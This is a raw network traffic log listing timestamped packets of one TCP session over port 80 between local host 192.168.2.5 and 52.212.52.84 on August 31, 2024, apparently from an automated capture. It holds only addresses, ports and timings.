Aug 31, 2024 15:44:18.426618099 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.426629066 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.426639080 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.426666975 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.426678896 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.426754951 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.426764965 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.426774025 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.426784039 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.426804066 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.426822901 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.510622025 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.510642052 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.510654926 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.510677099 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.510687113 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.510689020 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.510704041 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.510715008 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.510715008 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.510735035 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.510766029 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.510792017 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.511411905 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.511428118 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.511431932 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.511471987 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.511482000 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.511482954 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.511518955 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.511651993 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.511662960 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.511672020 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.511693954 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.511710882 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.511714935 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.511720896 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.511730909 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.511739016 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.511739969 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.511751890 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.511760950 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.511768103 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.511774063 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.511781931 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.511787891 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.511790991 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.511801004 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.511804104 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.511825085 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.511833906 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.511837006 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.511848927 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.511854887 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.511862040 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.511869907 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.511877060 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.511878967 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.511890888 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.511897087 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.511910915 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.511912107 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.511920929 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.511921883 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.511931896 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.511933088 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.511944056 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.511966944 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.511986971 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.512110949 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.512121916 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.512136936 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.512154102 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.512162924 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.512172937 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.512182951 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.512185097 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.512192965 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.512216091 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.512228012 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.512248993 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.512259007 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.512270927 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.512285948 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.512299061 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.512300968 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.512312889 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.512316942 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.512326956 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.512339115 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.512372971 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.512372971 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.512868881 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.512908936 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.512921095 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.512970924 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.512973070 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.512983084 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.512996912 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.513008118 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.513017893 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.513026953 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.513029099 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.513053894 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.513067007 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.513223886 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.513233900 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.513242960 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.513286114 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.513286114 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.513297081 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.513308048 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.513318062 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.513338089 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.513349056 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.513379097 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.513897896 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.513948917 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.513959885 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.513971090 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.514008999 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.514022112 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.514033079 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.514043093 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.514053106 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.514069080 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.514087915 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.514127970 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.514195919 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.514241934 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.514250994 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.514261007 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.514291048 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.514292002 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.514302015 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.514312029 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.514317989 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.514323950 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.514333963 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.514338017 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.514359951 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.514369011 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.515113115 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.515121937 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.515173912 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.515183926 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.515186071 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.515197992 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.515218973 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.515228987 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.515244961 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.515250921 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.515261889 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.515266895 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.515302896 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.516155005 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.516170025 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.516180992 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.516191006 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.516200066 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.516210079 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.516227007 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.516230106 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.516237974 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.516253948 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.516256094 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.516264915 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.516269922 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.516274929 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.516282082 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.516300917 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.516331911 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.516335964 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.516344070 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.516352892 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.516364098 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.516376019 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.516391993 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.516405106 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.517390966 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.517406940 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.517416000 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.517426014 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.517442942 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.517452955 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.517457008 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.517469883 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.517482996 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.517494917 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.517529011 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.517539978 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.517561913 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.517574072 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.517584085 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.517589092 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.517595053 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.517606020 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.517620087 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.517622948 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.517647028 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.517654896 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.602078915 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.602089882 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.602098942 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.602128029 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.602128983 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.602140903 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.602147102 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.602154016 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.602164030 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.602174044 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.602196932 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.602196932 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.602224112 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.602592945 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.602602959 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.602612972 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.602653980 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.602653980 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.602665901 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.602675915 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.602685928 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.602694035 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.602718115 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.602742910 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.602750063 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.602758884 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.602763891 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.602772951 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.602797985 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.602813959 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.602868080 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.602878094 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.602926016 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.602926970 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.602937937 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.602971077 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.603003979 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.603013992 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.603049994 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.603178978 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.603233099 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.603238106 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.603249073 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.603279114 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.603287935 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.603288889 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.603307009 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.603319883 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.603321075 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.603332043 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.603343010 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.603377104 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.603394032 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.603405952 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.603415012 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.603425026 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.603444099 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.603457928 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.603585958 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.603599072 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.603610992 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.603621006 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.603631020 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.603641987 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.603652000 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.603652954 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.603663921 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.603672981 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.603688002 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.603696108 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.603704929 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.603707075 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.603718042 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.603730917 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.603741884 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.603744984 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.603753090 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.603753090 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.603765965 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.603777885 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.603787899 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.603790998 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.603802919 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.603822947 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.603843927 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.604305029 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.604352951 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.604355097 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.604363918 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.604397058 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.604408979 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.604409933 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.604433060 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.604441881 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.604445934 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.604463100 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.604473114 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.604489088 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.604984045 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.604995012 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.605005980 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.605042934 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.605042934 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.605055094 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.605067015 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.605068922 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.605083942 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.605097055 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.605128050 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.605165958 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.605178118 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.605190039 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.605201006 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.605211973 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.605222940 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.605218887 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.605236053 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.605236053 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.605248928 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.605262041 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.605293036 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.605305910 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.605318069 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.605329037 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.605339050 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.605349064 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.605351925 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.605365038 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.605376959 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.605405092 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.605912924 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.605957985 CEST	80	49727	52.212.52.84	192.168.2.5
